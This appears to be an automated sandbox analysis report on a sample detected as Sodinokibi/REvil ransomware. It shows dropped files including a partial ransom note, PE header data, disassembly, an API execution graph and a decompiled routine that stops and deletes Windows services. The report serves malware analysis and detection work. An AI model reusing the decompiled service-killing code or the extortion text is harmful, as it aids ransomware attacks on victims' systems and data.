          C:\bootTel.dat
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):312
          Entropy (8bit):7.407224004013357
          Encrypted:false
          SSDEEP:6:00TrhvLEca+BhUx59hC/1oXk+vYro1wANxP7GjqhT6/XKArAGyoDfAz0Q7VpVm98:00T1vLjaxA1j86ANh7HT6/XKAr54zFFN
          MD5:4D67AC14E97DE5526B2A746B6D5E47A4
          SHA1:72BD2D6BA3692D796BF84AC87359C14D8B835E57
          SHA-256:40FFA105897E5855B0FC1A8964A9FFAFF08E0314C254D146F85DC7669EC8A7E1
          SHA-512:DECE7797627085107516DA143F3C93EBD6CBA231A229FF3AA870C85C916ECC244E86C821B23F274EF83D5D0011E4E9AA3AA157C8111B323770C3F2341756812D
          Malicious:false
          Preview: z0(..P]N...*........9.Q..d....y>vZ.k9.4.....{n?.%...w`.[d.\{.c..\a.J..^kx.......gx..-...3U...I....\U.rD`_T.D...o...w.G..V.N....vkXn..s...~.4..x;X..C.}DK.......Hsa(`...1.3..0C.AV.1..R...|bi..6......6N.../.....c...........8l..8..[9..W..|.......(...... .K.3.9*.D.....v...I$..I..5..........h.
          C:\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:true
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.

          Static File Info

          General

          File type:PE32 executable (GUI) Intel 80386, for MS Windows
          Entropy (8bit):6.592364626667132
          TrID:
          • Win32 Executable (generic) a (10002005/4) 99.96%
          • Generic Win/DOS Executable (2004/3) 0.02%
          • DOS Executable Generic (2002/1) 0.02%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name:Sample_5fba9b06c7da400016eb6275.exe
          File size:120832
          MD5:0e285f30f30dedd812295d2408f4b84c
          SHA1:24e8a7a0b9fdf929e6cc4b52b0470bf4f7b6f244
          SHA256:d91f951bdcf35012ac6b47c28cf32ec143e4269243d8c229f6cb326fd343df95
          SHA512:0e89d41a5bd1389d74e661e8f9d3efedff589c2e64f444971e349436a9b6f191f0a0d6017a1e7c28d33be382600b08d00f9496ebdfcf839943d559d1a10a8503
          SSDEEP:1536:ac79OtHXciw8MfMNQulioPIKNpVO6OICS4AziU/U/F20rg8sNlQoaA:EXCSK4IKvXhiU/+F20EVlQTA
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(\..F...F...F...C...F...E...F...B...F.|w....F.|w....F...G...F.|w....F.6.B...F.6.D...F.Rich..F.........PE..L....%._...........

          File Icon

          Icon Hash:00828e8e8686b000

          Static PE Info

          General

          Entrypoint:0x404414
          Entrypoint Section:.text
          Digitally signed:false
          Imagebase:0x400000
          Subsystem:windows gui
          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
          DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE
          Time Stamp:0x5FAF25E1 [Sat Nov 14 00:33:37 2020 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:5
          OS Version Minor:1
          File Version Major:5
          File Version Minor:1
          Subsystem Version Major:5
          Subsystem Version Minor:1
          Import Hash:3eff7b78fa879bdd7bc10b8b899e0ab3

          Entrypoint Preview

          Instruction
          push 00000000h
          call 00007F784471AD27h
          push 00000000h
          call 00007F784471B62Ah
          pop ecx
          ret
          push ebp
          mov ebp, esp
          sub esp, 2Ch
          lea eax, dword ptr [ebp-2Ch]
          push esi
          push eax
          push 00000018h
          pop esi
          push esi
          push dword ptr [ebp+08h]
          call dword ptr [00411244h]
          test eax, eax
          je 00007F784471AF56h
          mov eax, dword ptr [ebp-1Ah]
          imul eax, dword ptr [ebp-1Ch]
          push ebx
          push edi
          xor edi, edi
          inc edi
          movzx eax, ax
          cmp ax, di
          jne 00007F784471ADC6h
          mov ebx, edi
          jmp 00007F784471ADE8h
          push 00000004h
          pop ebx
          cmp ax, bx
          jbe 00007F784471ADE0h
          push 00000008h
          pop ebx
          cmp ax, bx
          jbe 00007F784471ADD8h
          push 00000010h
          pop ebx
          cmp ax, bx
          jbe 00007F784471ADD0h
          cmp ax, si
          jnbe 00007F784471ADC8h
          mov ebx, esi
          push 00000028h
          jmp 00007F784471ADD3h
          push 00000020h
          pop ebx
          mov eax, edi
          mov cl, bl
          shl eax, cl
          lea eax, dword ptr [00000028h+eax*4]
          push eax
          push 00000040h
          call dword ptr [00411280h]
          mov esi, eax
          push 00000018h
          mov dword ptr [esi], 00000028h
          mov eax, dword ptr [ebp-28h]
          mov dword ptr [esi+04h], eax
          mov eax, dword ptr [ebp-24h]
          mov dword ptr [esi+08h], eax
          mov ax, word ptr [ebp-1Ch]
          mov word ptr [esi+0Ch], ax
          mov ax, word ptr [ebp-1Ah]
          mov word ptr [esi+0Eh], ax
          pop eax
          cmp bx, ax
          jnc 00007F784471ADC9h
          mov cl, bl
          shl edi, cl
          mov dword ptr [esi+20h], edi
          mov eax, dword ptr [esi+04h]
          xor edi, edi
          add eax, 07h
          movzx ecx, bx
          cdq
          and edx, 07h
          mov dword ptr [esi+00h], edi

          Rich Headers

          Programming Language:
          • [LNK] VS2015 UPD3.1 build 24215
          • [ C ] VS2015 UPD3.1 build 24215

          Data Directories

          Name                                   Virtual Address   Virtual Size   Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT           0x0               0x0
          IMAGE_DIRECTORY_ENTRY_IMPORT           0xfbd8            0x3c           .rdata
          IMAGE_DIRECTORY_ENTRY_RESOURCE         0x0               0x0
          IMAGE_DIRECTORY_ENTRY_EXCEPTION        0x0               0x0
          IMAGE_DIRECTORY_ENTRY_SECURITY         0x0               0x0
          IMAGE_DIRECTORY_ENTRY_BASERELOC        0x20000           0x6c8          .reloc
          IMAGE_DIRECTORY_ENTRY_DEBUG            0x0               0x0
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT        0x0               0x0
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR        0x0               0x0
          IMAGE_DIRECTORY_ENTRY_TLS              0x0               0x0
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG      0x0               0x0
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT     0x0               0x0
          IMAGE_DIRECTORY_ENTRY_IAT              0xd000            0x30           .rdata
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT     0x0               0x0
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR   0x0               0x0
          IMAGE_DIRECTORY_ENTRY_RESERVED         0x0               0x0

          Sections

          Name     Virtual Address   Virtual Size   Raw Size   Xored PE   ZLIB Complexity   File Type   Entropy         Characteristics
          .text    0x1000            0xb6a4         0xb800     False      0.57470703125     data        6.55398000813   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          .rdata   0xd000            0x2cd4         0x2e00     False      0.667629076087    data        7.79698802019   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .data    0x10000           0x2318         0x1e00     False      0.91796875        data        7.62577900558   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
          .axh     0x13000           0xc800         0xc800     False      0.57021484375     data        5.50276054743   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
          .reloc   0x20000           0x6c8          0x800      False      0.75146484375     data        6.10110704434   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

          Imports

          DLL            Import
          KERNEL32.dll   lstrlenW, SetErrorMode, VerSetConditionMask, CloseHandle, GetExitCodeProcess, VerifyVersionInfoW, lstrcmpA
          OLEAUT32.dll   VariantClear, VariantInit

          Network Behavior

          No network behavior found

          Code Manipulations

          System Behavior

          General

          Start time:10:03:30
          Start date:03/12/2020
          Path:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          Wow64 process (32bit):true
          Commandline:'C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe'
          Imagebase:0x9b0000
          File size:120832 bytes
          MD5 hash:0E285F30F30DEDD812295D2408F4B84C
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Sodinokibi, Description: Yara detected Sodinokibi Ransomware, Source: 00000000.00000003.348277768.0000000002B4F000.00000004.00000040.sdmp, Author: Joe Security
          • Rule: JoeSecurity_Sodinokibi, Description: Yara detected Sodinokibi Ransomware, Source: 00000000.00000003.348165108.0000000002B4F000.00000004.00000040.sdmp, Author: Joe Security
          • Rule: MAL_RANSOM_REvil_Oct20_1, Description: Detects REvil ransomware, Source: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Author: Florian Roth
          • Rule: MAL_RANSOM_REvil_Oct20_1, Description: Detects REvil ransomware, Source: 00000000.00000000.347800253.00000000009B1000.00000020.00020000.sdmp, Author: Florian Roth
          Reputation:low

          General

          Start time:10:04:53
          Start date:03/12/2020
          Path:C:\Windows\System32\wbem\unsecapp.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\wbem\unsecapp.exe -Embedding
          Imagebase:0x7ff60d110000
          File size:48640 bytes
          MD5 hash:9CBD3EC8D9E4F8CE54258B0573C66BEB
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:moderate

          Disassembly

          Code Analysis

            Execution Graph

            Execution Coverage:32.6%
            Dynamic/Decrypted Code Coverage:0%
            Signature Coverage:9.8%
            Total number of Nodes:1132
            Total number of Limit Nodes:9

            Graph

            execution_graph: interactive node/edge listing of the execution graph (not reproduced as text)
4882->4883 4884 9b5162 7 API calls 4883->4884 4890 9b7a69 4883->4890 4887 9b7a11 4884->4887 4885 9b7a5e RevertToSelf 4888 9b4999 RtlFreeHeap 4885->4888 4886 9b7a16 GetDriveTypeW 4886->4887 4887->4885 4887->4886 4889 9b766a 53 API calls 4887->4889 4888->4890 4889->4887 4890->4798 4892 9b7a9a 4891->4892 4893 9b34e8 4891->4893 4894 9b494c 3 API calls 4892->4894 4893->4814 4895 9b7aad 4894->4895 4896 9b7ab4 WNetCloseEnum 4895->4896 4903 9b7ac4 4895->4903 4896->4893 4897 9b7ac5 WNetEnumResourceW 4897->4903 4898 9b7bb9 4899 9b4999 RtlFreeHeap 4898->4899 4900 9b7bbf WNetCloseEnum 4899->4900 4900->4893 4901 9b7a73 53 API calls 4901->4903 4902 9b494c 3 API calls 4902->4903 4903->4897 4903->4898 4903->4901 4903->4902 4904 9b766a 53 API calls 4903->4904 4905 9b4999 RtlFreeHeap 4903->4905 4904->4903 4905->4903 5040 9b53f1 GetSystemInfo 4906->5040 4908 9b7448 4909 9b7452 PostQueuedCompletionStatus 4908->4909 4910 9b746a 4908->4910 5042 9b53f1 GetSystemInfo 4909->5042 4912 9b7479 4910->4912 4913 9b746c 4910->4913 5041 9b4928 HeapDestroy 4912->5041 4913->4910 5043 9b575c Sleep 4913->5043 4916 9b7480 4917 9b4bee FindCloseChangeNotification 4916->4917 4918 9b7488 4917->4918 4918->4800 4919->4797 4920->4800 4921->4830 4923 9b7691 4922->4923 4929 9b76ad 4923->4929 5044 9b7944 4923->5044 4926 9b3400 4926->4819 4927 9b7874 4927->4926 4928 9b4999 RtlFreeHeap 4927->4928 4928->4927 4929->4927 4930 9b4999 RtlFreeHeap 4929->4930 4932 9b7749 FindFirstFileW 4929->4932 4933 9b7737 FindFirstFileExW 4929->4933 4934 9b784b FindNextFileW 4929->4934 4935 9b7861 FindClose 4929->4935 4936 9b7944 3 API calls 4929->4936 4937 9b2d02 12 API calls 4929->4937 5054 9b5408 GetPEB 4929->5054 5055 9b38a7 4929->5055 4930->4929 4932->4929 4933->4929 4934->4929 4934->4935 4935->4929 4936->4929 4937->4929 4940->4821 4941->4870 4951 9b53f1 GetSystemInfo 4942->4951 4944 9b74a4 4945 9b74ab CreateThread 4944->4945 4946 9b74d3 4944->4946 4947 9b4bee FindCloseChangeNotification 4944->4947 4952 9b53f1 GetSystemInfo 
4944->4952 4945->4944 4945->4946 4953 9b3561 4945->4953 4946->4880 4950 9b4928 HeapDestroy 4946->4950 4947->4944 4949->4880 4950->4878 4951->4944 4952->4944 4964 9b7568 GetQueuedCompletionStatus 4953->4964 4955 9b3665 RtlGetLastWin32Error 4956 9b357f 4955->4956 4956->4955 4959 9b369d 4956->4959 4965 9b3150 4956->4965 4976 9b3722 4956->4976 4985 9b36ab 4956->4985 4994 9b3236 4956->4994 5004 9b2e8c 4956->5004 5007 9b7568 GetQueuedCompletionStatus 4956->5007 4964->4956 4966 9b4bee FindCloseChangeNotification 4965->4966 4967 9b3164 4966->4967 4968 9b494c 3 API calls 4967->4968 4970 9b317d 4968->4970 4969 9b31ae 5015 9b2eae 4969->5015 4970->4969 5008 9b7989 MoveFileW 4970->5008 4975 9b4999 RtlFreeHeap 4975->4969 4977 9b3747 4976->4977 5030 9b7650 WriteFile 4977->5030 4979 9b377c 4980 9b37a3 4979->4980 4981 9b3781 RtlGetLastWin32Error 4979->4981 4980->4956 4981->4980 4984 9b378d 4981->4984 4984->4979 5031 9b575c Sleep 4984->5031 5032 9b7650 WriteFile 4984->5032 4986 9b36ca 4985->4986 5033 9b7650 WriteFile 4986->5033 4988 9b36f5 4989 9b36fa RtlGetLastWin32Error 4988->4989 4990 9b371e 4988->4990 4989->4990 4991 9b3706 4989->4991 4990->4956 4991->4988 5034 9b575c Sleep 4991->5034 5035 9b7650 WriteFile 4991->5035 5036 9b761c ReadFile 4994->5036 4996 9b3264 4997 9b3269 RtlGetLastWin32Error 4996->4997 4998 9b327a 4996->4998 4999 9b3297 4996->4999 5002 9b3295 4996->5002 4997->4996 4997->5002 4998->4996 5037 9b575c Sleep 4998->5037 5038 9b761c ReadFile 4998->5038 5000 9b2e8c PostQueuedCompletionStatus 4999->5000 5000->5002 5002->4956 5039 9b7585 PostQueuedCompletionStatus 5004->5039 5006 9b2ea9 5006->4956 5007->4956 5009 9b799f RtlGetLastWin32Error 5008->5009 5010 9b31a6 5008->5010 5009->5010 5011 9b79a9 5009->5011 5010->4975 5012 9b5162 7 API calls 5011->5012 5013 9b79ae 5012->5013 5013->5010 5014 9b79b2 MoveFileW 5013->5014 5014->5010 5016 9b2ec3 5015->5016 5021 9b759f 5016->5021 5022 9b4bee FindCloseChangeNotification 5021->5022 5023 9b75ae 5022->5023 5024 9b4999 RtlFreeHeap 
5023->5024 5025 9b2ec9 5024->5025 5026 9b7554 5025->5026 5029 9b4936 RtlFreeHeap 5026->5029 5028 9b2ed2 5028->4956 5029->5028 5030->4979 5031->4984 5032->4984 5033->4988 5034->4991 5035->4991 5036->4996 5037->4998 5038->4998 5039->5006 5040->4908 5041->4916 5042->4908 5043->4913 5045 9b494c 3 API calls 5044->5045 5046 9b794f 5045->5046 5047 9b6253 3 API calls 5046->5047 5048 9b76a5 5046->5048 5047->5048 5049 9b2d02 5048->5049 5064 9b5659 5049->5064 5052 9b2d2e 5052->4929 5054->4929 5088 9b2ed8 5055->5088 5058 9b38c7 5058->4929 5060 9b38d6 5061 9b38de 5060->5061 5121 9b7585 PostQueuedCompletionStatus 5060->5121 5061->5058 5062 9b2eae 2 API calls 5061->5062 5062->5058 5065 9b56c9 SetFileSecurityW 5064->5065 5066 9b566d GetCurrentProcess OpenProcessToken 5064->5066 5067 9b2d0d 5065->5067 5069 9b56dd SetFileSecurityW 5065->5069 5066->5067 5068 9b5685 5066->5068 5067->5052 5074 9b410d 5067->5074 5070 9b494c 3 API calls 5068->5070 5069->5067 5071 9b5690 5070->5071 5071->5067 5072 9b569a GetTokenInformation 5071->5072 5072->5067 5073 9b56b1 5072->5073 5073->5065 5075 9b411a 5074->5075 5076 9b494c 3 API calls 5075->5076 5077 9b412d 5076->5077 5082 9b416b 5077->5082 5086 9b7895 CreateFileW 5077->5086 5079 9b415c 5080 9b4999 RtlFreeHeap 5079->5080 5081 9b4164 5080->5081 5081->5082 5087 9b78ed WriteFile 5081->5087 5082->5052 5084 9b4187 5085 9b4bee FindCloseChangeNotification 5084->5085 5085->5082 5086->5079 5087->5084 5122 9b7895 CreateFileW 5088->5122 5090 9b2f43 5126 9b78d4 SetFilePointerEx 5090->5126 5091 9b2f19 5102 9b2f99 5091->5102 5123 9b7540 5091->5123 5094 9b2efa 5094->5090 5094->5091 5095 9b2f13 5094->5095 5098 9b4bee FindCloseChangeNotification 5095->5098 5096 9b2f3f 5100 9b2fa0 RtlGetLastWin32Error 5096->5100 5111 9b2fc7 5096->5111 5097 9b2f52 5127 9b78bb ReadFile 5097->5127 5098->5091 5100->5102 5105 9b2faa 5100->5105 5101 9b2f68 5106 9b4bee FindCloseChangeNotification 5101->5106 5102->5058 5120 9b740b CreateIoCompletionPort 5102->5120 5105->5096 5107 9b7540 
RtlAllocateHeap 5105->5107 5134 9b575c Sleep 5105->5134 5106->5091 5107->5105 5108 9b2fe8 RtlGetLastWin32Error 5108->5111 5112 9b3026 5108->5112 5109 9b3067 5156 9b3077 5109->5156 5111->5108 5111->5109 5114 9b3037 5111->5114 5115 9b5659 8 API calls 5111->5115 5118 9b3016 SetFileAttributesW 5111->5118 5128 9b75bb CreateFileW 5111->5128 5113 9b7554 RtlFreeHeap 5112->5113 5113->5102 5114->5111 5135 9b5a77 5114->5135 5155 9b575c Sleep 5114->5155 5117 9b3005 GetFileAttributesW 5115->5117 5117->5111 5117->5112 5118->5111 5118->5112 5120->5060 5121->5061 5122->5094 5124 9b48ee RtlAllocateHeap 5123->5124 5125 9b7550 5124->5125 5125->5096 5126->5097 5127->5101 5129 9b75eb 5128->5129 5130 9b75ef 5128->5130 5129->5111 5131 9b6253 3 API calls 5130->5131 5132 9b75f7 5131->5132 5132->5129 5133 9b4bee FindCloseChangeNotification 5132->5133 5133->5129 5134->5105 5136 9b5a84 5135->5136 5161 9b5408 GetPEB 5136->5161 5138 9b5a9b 5139 9b5c1d 5138->5139 5162 9b5c62 5138->5162 5139->5114 5141 9b5aae 5141->5139 5142 9b5ab6 OpenSCManagerW 5141->5142 5147 9b5ad9 5142->5147 5143 9b5bfe CloseServiceHandle 5143->5139 5145 9b5b4e OpenServiceW 5145->5143 5146 9b5b70 ControlService 5145->5146 5146->5147 5148 9b5b8e DeleteService 5146->5148 5147->5139 5147->5143 5147->5145 5152 9b5bbc OpenProcess 5147->5152 5165 9b4b05 5147->5165 5174 9b4ab8 OpenProcess 5147->5174 5148->5143 5149 9b5b99 CloseServiceHandle 5148->5149 5149->5147 5152->5147 5153 9b5bcd TerminateProcess 5152->5153 5154 9b4bee FindCloseChangeNotification 5153->5154 5154->5147 5155->5114 5157 9b67c7 9 API calls 5156->5157 5158 9b30b0 5157->5158 5159 9b6a62 9 API calls 5158->5159 5160 9b3100 5159->5160 5160->5102 5161->5138 5178 9b49d3 5162->5178 5166 9b4b1b 5165->5166 5168 9b4b20 5165->5168 5167 9b494c 3 API calls 5166->5167 5167->5168 5169 9b4b33 OpenProcess 5168->5169 5170 9b4b4a QueryFullProcessImageNameW 5169->5170 5173 9b4b7d 5169->5173 5171 9b4bee FindCloseChangeNotification 5170->5171 5172 9b4b63 PathFindFileNameW 5171->5172 
5172->5173 5173->5147 5175 9b4b00 5174->5175 5176 9b4ad7 GetExitCodeProcess Sleep 5174->5176 5175->5147 5176->5176 5177 9b4af6 CloseHandle 5176->5177 5177->5175 5179 9b49dd VerSetConditionMask VerifyVersionInfoW 5178->5179 5179->5141 5181 9b54cc 9 API calls 5180->5181 5182 9b45e9 5181->5182 5183 9b494c 3 API calls 5182->5183 5196 9b468a 5182->5196 5185 9b4603 5183->5185 5184 9b54cc 9 API calls 5184->5185 5185->5184 5186 9b464f 5185->5186 5185->5196 5214 9b57a9 GetTempPathW 5186->5214 5188 9b467e 5189 9b4684 5188->5189 5191 9b468c 5188->5191 5190 9b4999 RtlFreeHeap 5189->5190 5190->5196 5192 9b494c 3 API calls 5191->5192 5193 9b46a9 5192->5193 5194 9b4999 RtlFreeHeap 5193->5194 5193->5196 5195 9b46b8 5194->5195 5197 9b4999 RtlFreeHeap 5195->5197 5196->4847 5197->5196 5200 9b4444 LocalAlloc 5198->5200 5212 9b45c2 KiUserCallbackDispatcher 5198->5212 5201 9b44cb GlobalAlloc 5200->5201 5202 9b44c4 5200->5202 5203 9b4501 GetDIBits 5201->5203 5201->5212 5202->5201 5204 9b451e CreateFileW 5203->5204 5203->5212 5205 9b4541 WriteFile 5204->5205 5204->5212 5206 9b4587 WriteFile 5205->5206 5207 9b45a4 5205->5207 5206->5207 5208 9b45a7 WriteFile 5206->5208 5210 9b4bee FindCloseChangeNotification 5207->5210 5208->5207 5209 9b45c5 5208->5209 5211 9b4bee FindCloseChangeNotification 5209->5211 5210->5212 5213 9b45ca GlobalFree 5211->5213 5212->4854 5213->5212 5215 9b57ba 5214->5215 5216 9b57bc 5214->5216 5215->5188 5217 9b494c 3 API calls 5216->5217 5218 9b57c6 5217->5218 5219 9b57cd GetTempPathW 5218->5219 5222 9b57df 5218->5222 5220 9b57d9 5219->5220 5219->5222 5221 9b4999 RtlFreeHeap 5220->5221 5221->5222 5222->5188 5228 9b64b9 5223->5228 5230 9b6473 5223->5230 5225 9b64c4 5238 9b4928 HeapDestroy 5225->5238 5227 9b64cb 5227->4859 5237 9b4936 RtlFreeHeap 5228->5237 5229 9b4999 RtlFreeHeap 5229->5230 5230->5228 5230->5229 5236 9b4936 RtlFreeHeap 5230->5236 5233 9b1450 5232->5233 5235 9b1f6c 5232->5235 5233->4864 5234 9b4999 RtlFreeHeap 5234->5235 5235->5233 5235->5234 5236->5230 
5237->5225 5238->5227 5240 9b3971 5239->5240 5241 9b39e3 SysAllocString 5240->5241 5243 9b3975 5240->5243 5242 9b3a0c SysFreeString 5241->5242 5242->5243 5244 9b3a2f 5242->5244 5245 9b3ab5 SysAllocString SysAllocString 5244->5245 5246 9b3aed SysFreeString SysFreeString 5245->5246 5246->5243 5247 9b3b06 GetCurrentProcess WaitForSingleObject 5246->5247 5247->5243 5249 9b2937 5248->5249 5254 9b293b 5249->5254 5259 9b5327 GetNativeSystemInfo 5249->5259 5251 9b296d 5252 9b297a VariantInit 5251->5252 5256 9b29a8 5251->5256 5253 9b29a2 VariantClear 5252->5253 5253->5256 5255 9b2b38 VariantClear 5255->5256 5256->5254 5256->5255 5257 9b2adb wsprintfW 5256->5257 5258 9b2b29 VariantClear 5256->5258 5257->5256 5257->5258 5258->5256 5259->5251 5261 9b4a9a GetKeyboardLayoutList 5260->5261 5261->4263 5261->4264 5262->4275 5263->4278 5265 9b5425 4 API calls 5264->5265 5266 9b50a9 OpenProcess 5265->5266 5266->4298 5266->4303 5350 9b1194 5351 9b5cdd 6 API calls 5350->5351 5352 9b11a3 5351->5352 5353 9b11ca 5352->5353 5354 9b5d2f 6 API calls 5352->5354 5355 9b11bb 5354->5355 5356 9b4999 RtlFreeHeap 5355->5356 5357 9b11c3 5356->5357 5357->5353 5358 9b4999 RtlFreeHeap 5357->5358 5358->5353 5359 9b390f 5360 9b391a 5359->5360 5361 9b391e 5359->5361 5361->5360 5363 9b7919 PathFindExtensionW 5361->5363 5364 9b792e 5363->5364 5364->5360 5365 9b10c3 5366 9b5cdd 6 API calls 5365->5366 5367 9b10d2 5366->5367 5368 9b10f2 5367->5368 5369 9b5d2f 6 API calls 5367->5369 5370 9b10e7 5369->5370 5371 9b4999 RtlFreeHeap 5370->5371 5371->5368 5396 9b6f63 5399 9b7056 5396->5399 5402 9b5083 GetPEB 5399->5402 5401 9b6f6d 5402->5401 4079 9b27a0 4081 9b2913 4079->4081 4084 9b27b5 4079->4084 4080 9b27f7 VariantClear 4080->4084 4082 9b28ff VariantClear 4082->4084 4083 9b2897 VariantClear 4083->4084 4084->4080 4084->4081 4084->4082 4084->4083 4085 9b28df StrToIntW VariantClear 4084->4085 4086 9b28f8 4084->4086 4085->4084 4086->4082 4088 9b4199 OpenProcess 4086->4088 4089 9b41bf 4088->4089 4090 9b41b0 
TerminateProcess 4088->4090 4089->4086 4092 9b4bee 4090->4092 4093 9b4c00 4092->4093 4094 9b4bf7 FindCloseChangeNotification 4092->4094 4093->4089 4094->4093 5403 9b6fe0 5404 9b7056 GetPEB 5403->5404 5405 9b6fea 5404->5405

            Executed Functions

            Control-flow Graph

            C-Code - Quality: 41%
            			E009B3B6E() {
            				char _v8;
            				char _v12;
            				void* _v16;
            				struct _SERVICE_STATUS _v20;
            				short** _v24;
            				short* _v28;
            				void _v56;
            				struct _SERVICE_STATUS _v60;
            				void* _t28;
            				struct _SERVICE_STATUS _t37;
            				intOrPtr* _t40;
            				struct _SERVICE_STATUS _t43;
            				struct _SERVICE_STATUS _t45;
            				void* _t46;
            				int _t50;
            				void* _t58;
            				signed int _t63;
            				void* _t65;
            				short** _t67;
            				void* _t71;
            				struct _SERVICE_STATUS _t72;
            				void* _t74;
            
            				_t72 = 0;
            				_t28 = OpenSCManagerW(0, L"ServicesActive", 4); // executed
            				_t58 = _t28;
            				if(_t58 != 0) {
            					_push(0);
            					_push(0);
            					_v8 = 0;
            					_push( &_v12);
            					_v12 = 0;
            					_push( &_v8);
            					_push(0);
            					_push(0);
            					_push(1);
            					_push(0x30);
            					_push(0);
            					_push(_t58);
            					if( *0x9c12b8() == 0 || RtlGetLastWin32Error() == 0xea) {
            						_t67 = E009B494C(_v8);
            						_v24 = _t67;
            						if(_t67 != 0) {
            							_push(_t72);
            							_push(_t72);
            							_push( &_v12);
            							_push( &_v8);
            							_push(_v8);
            							_push(_t67);
            							_push(1);
            							_push(0x30);
            							_push(_t72);
            							_push(_t58);
            							if( *0x9c12b8() == 0) {
            								L25:
            								CloseServiceHandle(_t58);
            								_t37 = _t72;
            								L26:
            								return _t37;
            							}
            							_v20 = _t72;
            							if(_v12 <= _t72) {
            								L24:
            								_t72 = 1;
            								goto L25;
            							} else {
            								goto L9;
            							}
            							do {
            								L9:
            								_v28 =  *_t67;
            								E009B60E8( *_t67);
            								_t40 =  *0x9c22d0; // 0x0
            								while(1) {
            									_v16 = _t40;
            									if(_t40 == 0) {
            										break;
            									}
            									if(E009B5EA0( *_t40, _v28) != 0) {
            										_t43 = 1;
            										L14:
            										if(_t43 == 0) {
            											goto L19;
            										}
            										_t46 = OpenServiceW(_t58,  *_t67, 0x10020); // executed
            										_t65 = _t46;
            										_v16 = _t65;
            										if(_t65 == 0) {
            											goto L24;
            										}
            										_t63 = 6;
            										_v60 = _t72;
            										memset( &_v56, 0, _t63 << 2);
            										_t74 = _t74 + 0xc;
            										_t50 = ControlService(_t65, 1,  &_v60);
            										_t71 = _v16;
            										_push(_t71);
            										if(_t50 == 0) {
            											L23:
            											CloseServiceHandle();
            											goto L24;
            										}
            										if(DeleteService() == 0) {
            											_push(_t71);
            											goto L23;
            										}
            										_t67 = _v24;
            										goto L19;
            									}
            									_t40 =  *((intOrPtr*)(_v16 + 4));
            								}
            								_t43 = _t72;
            								goto L14;
            								L19:
            								_t67 =  &(_t67[0xb]);
            								_t45 = _v20 + 1;
            								_v24 = _t67;
            								_v20 = _t45;
            							} while (_t45 < _v12);
            							goto L24;
            						}
            						CloseServiceHandle(_t58);
            						_t37 = 0;
            						goto L26;
            					} else {
